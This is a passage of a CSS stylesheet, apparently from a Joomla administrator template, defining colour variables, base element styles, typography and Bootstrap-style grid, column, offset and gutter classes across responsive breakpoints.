  --template-text-light: #fff;
  --template-special-color: #001b4c;
  --template-link-color: #2a69b8;
  --template-link-hover-color: #173a65;
  --template-contrast: #2a69b8;
  --template-bg-dark: hsl(var(--hue), 40%, 20%);
  --template-bg-dark-3: hsl(var(--hue), 40%, 97%);
  --template-bg-dark-5: hsl(var(--hue), 40%, 95%);
  --template-bg-dark-7: hsl(var(--hue), 40%, 93%);
  --template-bg-dark-10: hsl(var(--hue), 40%, 90%);
  --template-bg-dark-15: hsl(var(--hue), 40%, 85%);
  --template-bg-dark-20: hsl(var(--hue), 40%, 80%);
  --template-bg-dark-30: hsl(var(--hue), 40%, 70%);
  --template-bg-dark-40: hsl(var(--hue), 40%, 60%);
  --template-bg-dark-50: hsl(var(--hue), 40%, 50%);
  --template-bg-dark-60: hsl(var(--hue), 40%, 40%);
  --template-bg-dark-65: hsl(var(--hue), 40%, 35%);
  --template-bg-dark-70: hsl(var(--hue), 40%, 30%);
  --template-bg-dark-75: hsl(var(--hue), 40%, 25%);
  --template-bg-dark-80: hsl(var(--hue), 40%, 20%);
  --template-bg-dark-90: hsl(var(--hue), 40%, 10%);
  --primary: #132f53;
  --secondary: #495057;
  --success: #457d54;
  --info: #2a69b8;
  --warning: #ffb514;
  --danger: #c52827;
  --light: #f8f9fa;
  --dark: #212529;
  --atum-link-color: #2a69b8;
  --atum-text-dark: #495057;
  --action: #132f53;
  --error: #3b0d0c;
  --alert-success: #0f2f21;
  --font-sans-serif: "Roboto", -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
  --font-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
  --gradient: linear-gradient(180deg, rgba(255, 255, 255, 0.15), rgba(255, 255, 255, 0));
}

*,
*::before,
*::after {
  box-sizing: border-box;
}

@media (prefers-reduced-motion: no-preference) {
  :root {
    scroll-behavior: smooth;
  }
}

body {
  margin: 0;
  font-family: var(--font-sans-serif);
  font-size: 1rem;
  font-weight: 400;
  line-height: 1.5;
  color: var(--template-text-dark);
  background-color: #fff;
  -webkit-text-size-adjust: 100%;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}

hr {
  margin: 1rem 0;
  color: inherit;
  background-color: currentColor;
  border: 0;
  opacity: 0.25;
}

hr:not([size]) {
  height: 1px;
}

h6, .h6, h5, .h5, h4, .h4, h3, .h3, h2, .h2, h1, .h1 {
  margin-top: 0;
  margin-bottom: 0.5rem;
  font-weight: 500;
  line-height: 1.2;
  color: var(--template-bg-dark);
}

h1, .h1 {
  font-size: calc(1.29rem + 0.48vw);
}
@media (min-width: 1200px) {
  h1, .h1 {
    font-size: 1.65rem;
  }
}

h2, .h2 {
  font-size: calc(1.275rem + 0.3vw);
}
@media (min-width: 1200px) {
  h2, .h2 {
    font-size: 1.5rem;
  }
}

h3, .h3 {
  font-size: 1.25rem;
}

h4, .h4 {
  font-size: 1rem;
}

h5, .h5 {
  font-size: 0.9286rem;
}

h6, .h6 {
  font-size: 0.8571rem;
}

p {
  margin-top: 0;
  margin-bottom: 1rem;
}

abbr[title],
abbr[data-bs-original-title] {
  -webkit-text-decoration: underline dotted;
          text-decoration: underline dotted;
  cursor: help;
  -webkit-text-decoration-skip-ink: none;
          text-decoration-skip-ink: none;
}

address {
  margin-bottom: 1rem;
  font-style: normal;
  line-height: inherit;
}

ol,
ul {
  padding-left: 2rem;
}

ol,
ul,
dl {
  margin-top: 0;
  margin-bottom: 1rem;
}

ol ol,
ul ul,
ol ul,
ul ol {
  margin-bottom: 0;
}

dt {
  font-weight: 700;
}

dd {
  margin-bottom: 0.5rem;
  margin-left: 0;
}

blockquote {
  margin: 0 0 1rem;
}

b,
strong {
  font-weight: bolder;
}

small, .small {
  font-size: 0.875em;
}

mark, .mark {
  padding: 0.2em;
  background-color: #fcf8e3;
}

sub,
sup {
  position: relative;
  font-size: 0.75em;
  line-height: 0;
  vertical-align: baseline;
}

sub {
  bottom: -0.25em;
}

sup {
  top: -0.5em;
}

a {
  color: var(--template-link-color);
  text-decoration: none;
}
a:hover {
  color: var(--template-link-hover-color);
}

a:not([href]):not([class]), a:not([href]):not([class]):hover {
  color: inherit;
  text-decoration: none;
}

pre,
code,
kbd,
samp {
  font-family: var(--font-monospace);
  font-size: 1em;
  direction: ltr /* rtl:ignore */;
  unicode-bidi: bidi-override;
}

pre {
  display: block;
  margin-top: 0;
  margin-bottom: 1rem;
  overflow: auto;
  font-size: 0.875em;
}
pre code {
  font-size: inherit;
  color: inherit;
  word-break: normal;
}

code {
  font-size: 0.875em;
  color: #971250;
  word-wrap: break-word;
}
a > code {
  color: inherit;
}

kbd {
  padding: 0.2rem 0.4rem;
  font-size: 0.875em;
  color: #fff;
  background-color: #212529;
  border-radius: 0.2rem;
}
kbd kbd {
  padding: 0;
  font-size: 1em;
  font-weight: 700;
}

figure {
  margin: 0 0 1rem;
}

img,
svg {
  vertical-align: middle;
}

table {
  caption-side: bottom;
  border-collapse: collapse;
}

caption {
  padding-top: 0.75rem;
  padding-bottom: 0.75rem;
  color: #666e76;
  text-align: left;
}

th {
  text-align: inherit;
  text-align: -webkit-match-parent;
}

thead,
tbody,
tfoot,
tr,
td,
th {
  border-color: inherit;
  border-style: solid;
  border-width: 0;
}

label {
  display: inline-block;
}

button {
  border-radius: 0;
}

button:focus:not(:focus-visible) {
  outline: 0;
}

input,
button,
select,
optgroup,
textarea {
  margin: 0;
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}

button,
select {
  text-transform: none;
}

[role=button] {
  cursor: pointer;
}

select {
  word-wrap: normal;
}
select:disabled {
  opacity: 1;
}

[list]::-webkit-calendar-picker-indicator {
  display: none;
}

button,
[type=button],
[type=reset],
[type=submit] {
  -webkit-appearance: button;
}
button:not(:disabled),
[type=button]:not(:disabled),
[type=reset]:not(:disabled),
[type=submit]:not(:disabled) {
  cursor: pointer;
}

::-moz-focus-inner {
  padding: 0;
  border-style: none;
}

textarea {
  resize: vertical;
}

fieldset {
  min-width: 0;
  padding: 0;
  margin: 0;
  border: 0;
}

legend {
  float: left;
  width: 100%;
  padding: 0;
  margin-bottom: 0.5rem;
  font-size: calc(1.275rem + 0.3vw);
  line-height: inherit;
}
@media (min-width: 1200px) {
  legend {
    font-size: 1.5rem;
  }
}
legend + * {
  clear: left;
}

::-webkit-datetime-edit-fields-wrapper,
::-webkit-datetime-edit-text,
::-webkit-datetime-edit-minute,
::-webkit-datetime-edit-hour-field,
::-webkit-datetime-edit-day-field,
::-webkit-datetime-edit-month-field,
::-webkit-datetime-edit-year-field {
  padding: 0;
}

::-webkit-inner-spin-button {
  height: auto;
}

[type=search] {
  outline-offset: -2px;
  -webkit-appearance: textfield;
}

/* rtl:raw:
[type="tel"],
[type="url"],
[type="email"],
[type="number"] {
  direction: ltr;
}
*/
::-webkit-search-decoration {
  -webkit-appearance: none;
}

::-webkit-color-swatch-wrapper {
  padding: 0;
}

::file-selector-button {
  font: inherit;
}

::-webkit-file-upload-button {
  font: inherit;
  -webkit-appearance: button;
}

output {
  display: inline-block;
}

iframe {
  border: 0;
}

summary {
  display: list-item;
  cursor: pointer;
}

progress {
  vertical-align: baseline;
}

[hidden] {
  display: none !important;
}

.lead {
  font-size: 1.25rem;
  font-weight: 300;
}

.display-1 {
  font-size: calc(1.625rem + 4.5vw);
  font-weight: 300;
  line-height: 1.2;
}
@media (min-width: 1200px) {
  .display-1 {
    font-size: 5rem;
  }
}

.display-2 {
  font-size: calc(1.575rem + 3.9vw);
  font-weight: 300;
  line-height: 1.2;
}
@media (min-width: 1200px) {
  .display-2 {
    font-size: 4.5rem;
  }
}

.display-3 {
  font-size: calc(1.525rem + 3.3vw);
  font-weight: 300;
  line-height: 1.2;
}
@media (min-width: 1200px) {
  .display-3 {
    font-size: 4rem;
  }
}

.display-4 {
  font-size: calc(1.475rem + 2.7vw);
  font-weight: 300;
  line-height: 1.2;
}
@media (min-width: 1200px) {
  .display-4 {
    font-size: 3.5rem;
  }
}

.display-5 {
  font-size: calc(1.425rem + 2.1vw);
  font-weight: 300;
  line-height: 1.2;
}
@media (min-width: 1200px) {
  .display-5 {
    font-size: 3rem;
  }
}

.display-6 {
  font-size: calc(1.375rem + 1.5vw);
  font-weight: 300;
  line-height: 1.2;
}
@media (min-width: 1200px) {
  .display-6 {
    font-size: 2.5rem;
  }
}

.list-unstyled {
  padding-left: 0;
  list-style: none;
}

.list-inline {
  padding-left: 0;
  list-style: none;
}

.list-inline-item {
  display: inline-block;
}
.list-inline-item:not(:last-child) {
  margin-right: 0.5rem;
}

.initialism {
  font-size: 0.875em;
  text-transform: uppercase;
}

.blockquote {
  margin-bottom: 1rem;
  font-size: 1.25rem;
}
.blockquote > :last-child {
  margin-bottom: 0;
}

.blockquote-footer {
  margin-top: -1rem;
  margin-bottom: 1rem;
  font-size: 0.875em;
  color: #666e76;
}
.blockquote-footer::before {
  content: "— ";
}

.img-fluid {
  max-width: 100%;
  height: auto;
}

.img-thumbnail {
  padding: 0.25rem;
  background-color: #fff;
  border: 1px solid #dee2e6;
  border-radius: 0.25rem;
  max-width: 100%;
  height: auto;
}

.figure {
  display: inline-block;
}

.figure-img {
  margin-bottom: 0.5rem;
  line-height: 1;
}

.figure-caption {
  font-size: 0.875em;
  color: #666e76;
}

.container,
.container-fluid,
.container-xxl,
.container-xl,
.container-lg,
.container-md,
.container-sm {
  width: 100%;
  padding-right: var(--gutter-x, 1rem);
  padding-left: var(--gutter-x, 1rem);
  margin-right: auto;
  margin-left: auto;
}

@media (min-width: 576px) {
  .container-sm, .container {
    max-width: 540px;
  }
}
@media (min-width: 768px) {
  .container-md, .container-sm, .container {
    max-width: 720px;
  }
}
@media (min-width: 992px) {
  .container-lg, .container-md, .container-sm, .container {
    max-width: 960px;
  }
}
@media (min-width: 1200px) {
  .container-xl, .container-lg, .container-md, .container-sm, .container {
    max-width: 1140px;
  }
}
@media (min-width: 1400px) {
  .container-xxl, .container-xl, .container-lg, .container-md, .container-sm, .container {
    max-width: 1320px;
  }
}
.row {
  --gutter-x: 2rem;
  --gutter-y: 0;
  display: flex;
  flex-wrap: wrap;
  margin-top: calc(var(--gutter-y) * -1);
  margin-right: calc(var(--gutter-x) * -.5);
  margin-left: calc(var(--gutter-x) * -.5);
}
.row > * {
  flex-shrink: 0;
  width: 100%;
  max-width: 100%;
  padding-right: calc(var(--gutter-x) * .5);
  padding-left: calc(var(--gutter-x) * .5);
  margin-top: var(--gutter-y);
}

.col {
  flex: 1 0 0%;
}

.row-cols-auto > * {
  flex: 0 0 auto;
  width: auto;
}

.row-cols-1 > * {
  flex: 0 0 auto;
  width: 100%;
}

.row-cols-2 > * {
  flex: 0 0 auto;
  width: 50%;
}

.row-cols-3 > * {
  flex: 0 0 auto;
  width: 33.3333333333%;
}

.row-cols-4 > * {
  flex: 0 0 auto;
  width: 25%;
}

.row-cols-5 > * {
  flex: 0 0 auto;
  width: 20%;
}

.row-cols-6 > * {
  flex: 0 0 auto;
  width: 16.6666666667%;
}

@media (min-width: 576px) {
  .col-sm {
    flex: 1 0 0%;
  }

  .row-cols-sm-auto > * {
    flex: 0 0 auto;
    width: auto;
  }

  .row-cols-sm-1 > * {
    flex: 0 0 auto;
    width: 100%;
  }

  .row-cols-sm-2 > * {
    flex: 0 0 auto;
    width: 50%;
  }

  .row-cols-sm-3 > * {
    flex: 0 0 auto;
    width: 33.3333333333%;
  }

  .row-cols-sm-4 > * {
    flex: 0 0 auto;
    width: 25%;
  }

  .row-cols-sm-5 > * {
    flex: 0 0 auto;
    width: 20%;
  }

  .row-cols-sm-6 > * {
    flex: 0 0 auto;
    width: 16.6666666667%;
  }
}
@media (min-width: 768px) {
  .col-md {
    flex: 1 0 0%;
  }

  .row-cols-md-auto > * {
    flex: 0 0 auto;
    width: auto;
  }

  .row-cols-md-1 > * {
    flex: 0 0 auto;
    width: 100%;
  }

  .row-cols-md-2 > * {
    flex: 0 0 auto;
    width: 50%;
  }

  .row-cols-md-3 > * {
    flex: 0 0 auto;
    width: 33.3333333333%;
  }

  .row-cols-md-4 > * {
    flex: 0 0 auto;
    width: 25%;
  }

  .row-cols-md-5 > * {
    flex: 0 0 auto;
    width: 20%;
  }

  .row-cols-md-6 > * {
    flex: 0 0 auto;
    width: 16.6666666667%;
  }
}
@media (min-width: 992px) {
  .col-lg {
    flex: 1 0 0%;
  }

  .row-cols-lg-auto > * {
    flex: 0 0 auto;
    width: auto;
  }

  .row-cols-lg-1 > * {
    flex: 0 0 auto;
    width: 100%;
  }

  .row-cols-lg-2 > * {
    flex: 0 0 auto;
    width: 50%;
  }

  .row-cols-lg-3 > * {
    flex: 0 0 auto;
    width: 33.3333333333%;
  }

  .row-cols-lg-4 > * {
    flex: 0 0 auto;
    width: 25%;
  }

  .row-cols-lg-5 > * {
    flex: 0 0 auto;
    width: 20%;
  }

  .row-cols-lg-6 > * {
    flex: 0 0 auto;
    width: 16.6666666667%;
  }
}
@media (min-width: 1200px) {
  .col-xl {
    flex: 1 0 0%;
  }

  .row-cols-xl-auto > * {
    flex: 0 0 auto;
    width: auto;
  }

  .row-cols-xl-1 > * {
    flex: 0 0 auto;
    width: 100%;
  }

  .row-cols-xl-2 > * {
    flex: 0 0 auto;
    width: 50%;
  }

  .row-cols-xl-3 > * {
    flex: 0 0 auto;
    width: 33.3333333333%;
  }

  .row-cols-xl-4 > * {
    flex: 0 0 auto;
    width: 25%;
  }

  .row-cols-xl-5 > * {
    flex: 0 0 auto;
    width: 20%;
  }

  .row-cols-xl-6 > * {
    flex: 0 0 auto;
    width: 16.6666666667%;
  }
}
@media (min-width: 1400px) {
  .col-xxl {
    flex: 1 0 0%;
  }

  .row-cols-xxl-auto > * {
    flex: 0 0 auto;
    width: auto;
  }

  .row-cols-xxl-1 > * {
    flex: 0 0 auto;
    width: 100%;
  }

  .row-cols-xxl-2 > * {
    flex: 0 0 auto;
    width: 50%;
  }

  .row-cols-xxl-3 > * {
    flex: 0 0 auto;
    width: 33.3333333333%;
  }

  .row-cols-xxl-4 > * {
    flex: 0 0 auto;
    width: 25%;
  }

  .row-cols-xxl-5 > * {
    flex: 0 0 auto;
    width: 20%;
  }

  .row-cols-xxl-6 > * {
    flex: 0 0 auto;
    width: 16.6666666667%;
  }
}
.col-auto {
  flex: 0 0 auto;
  width: auto;
}

.col-1 {
  flex: 0 0 auto;
  width: 8.33333333%;
}

.col-2 {
  flex: 0 0 auto;
  width: 16.66666667%;
}

.col-3 {
  flex: 0 0 auto;
  width: 25%;
}

.col-4 {
  flex: 0 0 auto;
  width: 33.33333333%;
}

.col-5 {
  flex: 0 0 auto;
  width: 41.66666667%;
}

.col-6 {
  flex: 0 0 auto;
  width: 50%;
}

.col-7 {
  flex: 0 0 auto;
  width: 58.33333333%;
}

.col-8 {
  flex: 0 0 auto;
  width: 66.66666667%;
}

.col-9 {
  flex: 0 0 auto;
  width: 75%;
}

.col-10 {
  flex: 0 0 auto;
  width: 83.33333333%;
}

.col-11 {
  flex: 0 0 auto;
  width: 91.66666667%;
}

.col-12 {
  flex: 0 0 auto;
  width: 100%;
}

.offset-1 {
  margin-left: 8.33333333%;
}

.offset-2 {
  margin-left: 16.66666667%;
}

.offset-3 {
  margin-left: 25%;
}

.offset-4 {
  margin-left: 33.33333333%;
}

.offset-5 {
  margin-left: 41.66666667%;
}

.offset-6 {
  margin-left: 50%;
}

.offset-7 {
  margin-left: 58.33333333%;
}

.offset-8 {
  margin-left: 66.66666667%;
}

.offset-9 {
  margin-left: 75%;
}

.offset-10 {
  margin-left: 83.33333333%;
}

.offset-11 {
  margin-left: 91.66666667%;
}

.g-0,
.gx-0 {
  --gutter-x: 0;
}

.g-0,
.gy-0 {
  --gutter-y: 0;
}

.g-1,
.gx-1 {
  --gutter-x: 0.25rem;
}

.g-1,
.gy-1 {
  --gutter-y: 0.25rem;
}

.g-2,
.gx-2 {
  --gutter-x: 0.5rem;
}

.g-2,
.gy-2 {
  --gutter-y: 0.5rem;
}

.g-3,
.gx-3 {
  --gutter-x: 1rem;
}

.g-3,
.gy-3 {
  --gutter-y: 1rem;
}

.g-4,
.gx-4 {
  --gutter-x: 1.5rem;
}

.g-4,
.gy-4 {
  --gutter-y: 1.5rem;
}

.g-5,
.gx-5 {
  --gutter-x: 3rem;
}

.g-5,
.gy-5 {
  --gutter-y: 3rem;
}

@media (min-width: 576px) {
  .col-sm-auto {
    flex: 0 0 auto;
    width: auto;
  }

  .col-sm-1 {
    flex: 0 0 auto;
    width: 8.33333333%;
  }

  .col-sm-2 {
    flex: 0 0 auto;
    width: 16.66666667%;
  }

  .col-sm-3 {
    flex: 0 0 auto;
    width: 25%;
  }

  .col-sm-4 {
    flex: 0 0 auto;
    width: 33.33333333%;
  }

  .col-sm-5 {
    flex: 0 0 auto;
    width: 41.66666667%;
  }

  .col-sm-6 {
    flex: 0 0 auto;
    width: 50%;
  }

  .col-sm-7 {
    flex: 0 0 auto;
    width: 58.33333333%;
  }

  .col-sm-8 {
    flex: 0 0 auto;
    width: 66.66666667%;
  }

  .col-sm-9 {
    flex: 0 0 auto;
    width: 75%;
  }

  .col-sm-10 {
    flex: 0 0 auto;
    width: 83.33333333%;
  }

  .col-sm-11 {
    flex: 0 0 auto;
    width: 91.66666667%;
  }

  .col-sm-12 {
    flex: 0 0 auto;
    width: 100%;
  }

  .offset-sm-0 {
    margin-left: 0;
  }

  .offset-sm-1 {
    margin-left: 8.33333333%;
  }

  .offset-sm-2 {
    margin-left: 16.66666667%;
  }

  .offset-sm-3 {
    margin-left: 25%;
  }

  .offset-sm-4 {
    margin-left: 33.33333333%;
  }

  .offset-sm-5 {
    margin-left: 41.66666667%;
  }

  .offset-sm-6 {
    margin-left: 50%;
  }

  .offset-sm-7 {
    margin-left: 58.33333333%;
  }

  .offset-sm-8 {
    margin-left: 66.66666667%;
  }

  .offset-sm-9 {
    margin-left: 75%;
  }

  .offset-sm-10 {
    margin-left: 83.33333333%;
  }

  .offset-sm-11 {
    margin-left: 91.66666667%;
  }

  .g-sm-0,
.gx-sm-0 {
    --gutter-x: 0;
  }

  .g-sm-0,
.gy-sm-0 {
    --gutter-y: 0;
  }

  .g-sm-1,
.gx-sm-1 {
    --gutter-x: 0.25rem;
  }

  .g-sm-1,
.gy-sm-1 {
    --gutter-y: 0.25rem;
  }

  .g-sm-2,
.gx-sm-2 {
    --gutter-x: 0.5rem;
  }

  .g-sm-2,
.gy-sm-2 {
    --gutter-y: 0.5rem;
  }

  .g-sm-3,
.gx-sm-3 {
    --gutter-x: 1rem;
  }

  .g-sm-3,
.gy-sm-3 {
    --gutter-y: 1rem;
  }

  .g-sm-4,
.gx-sm-4 {
    --gutter-x: 1.5rem;
  }

  .g-sm-4,
.gy-sm-4 {
    --gutter-y: 1.5rem;
  }

  .g-sm-5,
.gx-sm-5 {
    --gutter-x: 3rem;
  }

  .g-sm-5,
.gy-sm-5 {
    --gutter-y: 3rem;
  }
}
@media (min-width: 768px) {
  .col-md-auto {
    flex: 0 0 auto;
    width: auto;
  }

  .col-md-1 {
    flex: 0 0 auto;
    width: 8.33333333%;
  }

  .col-md-2 {
    flex: 0 0 auto;
    width: 16.66666667%;
  }

  .col-md-3 {
    flex: 0 0 auto;
    width: 25%;
  }

  .col-md-4 {
    flex: 0 0 auto;
    width: 33.33333333%;
  }

  .col-md-5 {
    flex: 0 0 auto;
    width: 41.66666667%;
  }

  .col-md-6 {
    flex: 0 0 auto;
    width: 50%;
  }

  .col-md-7 {
    flex: 0 0 auto;
    width: 58.33333333%;
  }

  .col-md-8 {
    flex: 0 0 auto;
    width: 66.66666667%;
  }

  .col-md-9 {
    flex: 0 0 auto;
    width: 75%;
  }

  .col-md-10 {
    flex: 0 0 auto;
    width: 83.33333333%;
  }

  .col-md-11 {
    flex: 0 0 auto;
    width: 91.66666667%;
  }

  .col-md-12 {
    flex: 0 0 auto;
    width: 100%;
  }

  .offset-md-0 {
    margin-left: 0;
  }

  .offset-md-1 {
    margin-left: 8.33333333%;
  }

  .offset-md-2 {
    margin-left: 16.66666667%;
  }

  .offset-md-3 {
    margin-left: 25%;
  }

  .offset-md-4 {
    margin-left: 33.33333333%;
  }

  .offset-md-5 {
    margin-left: 41.66666667%;
  }

  .offset-md-6 {
    margin-left: 50%;
  }

  .offset-md-7 {
    margin-left: 58.33333333%;
  }

  .offset-md-8 {
    margin-left: 66.66666667%;
  }

  .offset-md-9 {
    margin-left: 75%;
  }

  .offset-md-10 {
    margin-left: 83.33333333%;
  }

  .offset-md-11 {
    margin-left: 91.66666667%;
  }

  .g-md-0,
.gx-md-0 {
    --gutter-x: 0;
  }

  .g-md-0,
.gy-md-0 {
    --gutter-y: 0;
  }

  .g-md-1,
.gx-md-1 {
    --gutter-x: 0.25rem;
  }

  .g-md-1,
.gy-md-1 {
    --gutter-y: 0.25rem;
  }

  .g-md-2,
.gx-md-2 {
    --gutter-x: 0.5rem;
  }

  .g-md-2,
.gy-md-2 {
    --gutter-y: 0.5rem;
  }

  .g-md-3,
.gx-md-3 {
    --gutter-x: 1rem;
  }

  .g-md-3,
.gy-md-3 {
    --gutter-y: 1rem;
  }

  .g-md-4,
.gx-md-4 {
    --gutter-x: 1.5rem;
  }

  .g-md-4,
.gy-md-4 {
    --gutter-y: 1.5rem;
  }

  .g-md-5,
.gx-md-5 {
    --gutter-x: 3rem;
  }

  .g-md-5,
.gy-md-5 {
    --gutter-y: 3rem;
  }
}
@media (min-width: 992px) {
  .col-lg-auto {
    flex: 0 0 auto;
    width: auto;
  }

  .col-lg-1 {
    flex: 0 0 auto;
    width: 8.33333333%;
  }

  .col-lg-2 {
    flex: 0 0 auto;
    width: 16.66666667%;
  }

  .col-lg-3 {
    flex: 0 0 auto;
    width: 25%;
  }

  .col-lg-4 {
    flex: 0 0 auto;
    width: 33.33333333%;
  }

  .col-lg-5 {
    flex: 0 0 auto;
    width: 41.66666667%;
  }

  .col-lg-6 {
    flex: 0 0 auto;
    width: 50%;
  }

  .col-lg-7 {
    flex: 0 0 auto;
    width: 58.33333333%;
  }

  .col-lg-8 {
    flex: 0 0 auto;
    width: 66.66666667%;
  }

  .col-lg-9 {
    flex: 0 0 auto;
    width: 75%;
  }

  .col-lg-10 {
    flex: 0 0 auto;
    width: 83.33333333%;
  }

  .col-lg-11 {
    flex: 0 0 auto;
    width: 91.66666667%;
  }

  .col-lg-12 {
    flex: 0 0 auto;
    width: 100%;
  }

  .offset-lg-0 {
    margin-left: 0;
  }

  .offset-lg-1 {
    margin-left: 8.33333333%;
  }

  .offset-lg-2 {
    margin-left: 16.66666667%;
  }

  .offset-lg-3 {
    margin-left: 25%;
  }

  .offset-lg-4 {
    margin-left: 33.33333333%;
  }

  .offset-lg-5 {
    margin-left: 41.66666667%;
  }

  .offset-lg-6 {
    margin-left: 50%;
  }

  .offset-lg-7 {
    margin-left: 58.33333333%;
  }

  .offset-lg-8 {
    margin-left: 66.66666667%;
  }

  .offset-lg-9 {
    margin-left: 75%;
  }

  .offset-lg-10 {
    margin-left: 83.33333333%;
  }

  .offset-lg-11 {
    margin-left: 91.66666667%;
  }

  .g-lg-0,
.gx-lg-0 {
    --gutter-x: 0;
  }

  .g-lg-0,
.gy-lg-0 {
    --gutter-y: 0;
  }

  .g-lg-1,
.gx-lg-1 {
    --gutter-x: 0.25rem;
  }

  .g-lg-1,
.gy-lg-1 {
    --gutter-y: 0.25rem;
  }

  .g-lg-2,
.gx-lg-2 {
    --gutter-x: 0.5rem;
  }

  .g-lg-2,
.gy-lg-2 {
    --gutter-y: 0.5rem;
  }

  .g-lg-3,
.gx-lg-3 {
    --gutter-x: 1rem;
  }

  .g-lg-3,
.gy-lg-3 {
    --gutter-y: 1rem;
  }

  .g-lg-4,
.gx-lg-4 {
    --gutter-x: 1.5rem;
  }

  .g-lg-4,
.gy-lg-4 {
    --gutter-y: 1.5rem;
  }

  .g-lg-5,
.gx-lg-5 {
    --gutter-x: 3rem;
  }

  .g-lg-5,
.gy-lg-5 {
    --gutter-y: 3rem;
  }
}
@media (min-width: 1200px) {
  .col-xl-auto {
    flex: 0 0 auto;
    width: auto;
  }

  .col-xl-1 {
    flex: 0 0 auto;
    width: 8.33333333%;
  }

  .col-xl-2 {
    flex: 0 0 auto;
    width: 16.66666667%;
  }

  .col-xl-3 {
    flex: 0 0 auto;
    width: 25%;
  }

  .col-xl-4 {
    flex: 0 0 auto;
    width: 33.33333333%;
  }

  .col-xl-5 {
    flex: 0 0 auto;
    width: 41.66666667%;
  }

  .col-xl-6 {
    flex: 0 0 auto;
    width: 50%;
  }

  .col-xl-7 {
    flex: 0 0 auto;
    width: 58.33333333%;
  }

  .col-xl-8 {
    flex: 0 0 auto;
    width: 66.66666667%;
  }

  .col-xl-9 {
    flex: 0 0 auto;
    width: 75%;
  }

  .col-xl-10 {
    flex: 0 0 auto;
    width: 83.33333333%;
  }

  .col-xl-11 {
    flex: 0 0 auto;
    width: 91.66666667%;
  }

  .col-xl-12 {
    flex: 0 0 auto;
    width: 100%;
  }

  .offset-xl-0 {
    margin-left: 0;
  }

  .offset-xl-1 {
    margin-left: 8.33333333%;
  }

  .offset-xl-2 {
    margin-left: 16.66666667%;
  }

  .offset-xl-3 {
    margin-left: 25%;
  }

  .offset-xl-4 {
    margin-left: 33.33333333%;
  }

  .offset-xl-5 {
    margin-left: 41.66666667%;
  }

  .offset-xl-6 {
    margin-left: 50%;
  }

  .offset-xl-7 {
    margin-left: 58.33333333%;
  }

  .offset-xl-8 {
    margin-left: 66.66666667%;
  }

  .offset-xl-9 {
    margin-left: 75%;
  }

  .offset-xl-10 {
    margin-left: 83.33333333%;
  }

  .offset-xl-11 {
    margin-left: 91.66666667%;
  }

  .g-xl-0,
.gx-xl-0 {
    --gutter-x: 0;
  }

  .g-xl-0,
.gy-xl-0 {
    --gutter-y: 0;
  }

  .g-xl-1,
.gx-xl-1 {
    --gutter-x: 0.25rem;
  }

  .g-xl-1,
.gy-xl-1 {
    --gutter-y: 0.25rem;
  }

  .g-xl-2,
.gx-xl-2 {
    --gutter-x: 0.5rem;
  }

  .g-xl-2,
.gy-xl-2 {
    --gutter-y: 0.5rem;
  }

  .g-xl-3,
.gx-xl-3 {
    --gutter-x: 1rem;
  }

  .g-xl-3,
.gy-xl-3 {
    --gutter-y: 1rem;
  }

  .g-xl-4,
.gx-xl-4 {
    --gutter-x: 1.5rem;
  }

  .g-xl-4,
.gy-xl-4 {
    --gutter-y: 1.5rem;
  }

  .g-xl-5,
.gx-xl-5 {
    --gutter-x: 3rem;
  }

  .g-xl-5,
.gy-xl-5 {
    --gutter-y: 3rem;
  }
}
@media (min-width: 1400px) {
  .col-xxl-auto {
    flex: 0 0 auto;
    width: auto;
  }

  .col-xxl-1 {
    flex: 0 0 auto;
    width: 8.33333333%;
  }

  .col-xxl-2 {
    flex: 0 0 auto;
    width: 16.66666667%;
  }

  .col-xxl-3 {
    flex: 0 0 auto;
    width: 25%;
  }

  .col-xxl-4 {
    flex: 0 0 auto;
    width: 33.33333333%;
  }

  .col-xxl-5 {
    flex: 0 0 auto;
    width: 41.66666667%;
  }

  .col-xxl-6 {
    flex: 0 0 auto;
    width: 50%;
  }

  .col-xxl-7 {
    flex: 0 0 auto;
    width: 58.33333333%;
  }

  .col-xxl-8 {
    flex: 0 0 auto;
    width: 66.66666667%;
  }

  .col-xxl-9 {
    flex: 0 0 auto;
    width: 75%;
  }

  .col-xxl-10 {
    flex: 0 0 auto;
    width: 83.33333333%;
  }

  .col-xxl-11 {
    flex: 0 0 auto;
    width: 91.66666667%;
  }

  .col-xxl-12 {
    flex: 0 0 auto;
    width: 100%;
  }

  .offset-xxl-0 {
    margin-left: 0;
  }

  .offset-xxl-1 {
    margin-left: 8.33333333%;
  }

  .offset-xxl-2 {
    margin-left: 16.66666667%;
  }

  .offset-xxl-3 {
    margin-left: 25%;
  }

  .offset-xxl-4 {
    margin-left: 33.33333333%;
  }

  .offset-xxl-5 {
    margin-left: 41.66666667%;
  }

  .offset-xxl-6 {
    margin-left: 50%;
  }

  .offset-xxl-7 {
    margin-left: 58.33333333%;
  }

  .offset-xxl-8 {
    margin-left: 66.66666667%;
  }

  .offset-xxl-9 {
    margin-left: 75%;
  }

  .offset-xxl-10 {
    margin-left: 83.33333333%;
  }

  .offset-xxl-11 {
    margin-left: 91.66666667%;
  }

  .g-xxl-0,
.gx-xxl-0 {
    --gutter-x: 0;
  }

  .g-xxl-0,
.gy-xxl-0 {
    --gutter-y: 0;
  }

  .g-xxl-1,
.gx-xxl-1 {
    --gutter-x: 0.25rem;
  }

  .g-xxl-1,
.gy-xxl-1 {
    --gutter-y: 0.25rem;
  }

  .g-xxl-2,
.gx-xxl-2 {
    --gutter-x: 0.5rem;
  }

  .g-xxl-2,
.gy-xxl-2 {
    --gutter-y: 0.5rem;
  }

  .g-xxl-3,
.gx-xxl-3 {
    --gutter-x: 1rem;
  }

  .g-xxl-3,
.gy-xxl-3 {
    --gutter-y: 1rem;
  }

  .g-xxl-4,
.gx-xxl-4 {
    --gutter-x: 1.5rem;
  }

  .g-xxl-4,
.gy-xxl-4 {
    --gutter-y: 1.5rem;
  }

  .g-xxl-5,
.gx-xxl-5 {
    --gutter-x: 3rem;
  }

  .g-xxl-5,
.gy-xxl-5 {
    --gutter-y: 3rem;
  }
}
.table {
  --table-bg: var(--white);
  --table-accent-bg: transparent;
  --table-striped-color: var(--template-text-dark);
  --table-striped-bg: rgba(0, 0, 0, 0.05);
  --table-active-color: var(--template-text-dark);
  --table-active-bg: rgba(0, 0, 0, 0.1);
  --table-hover-color: var(--template-text-dark);
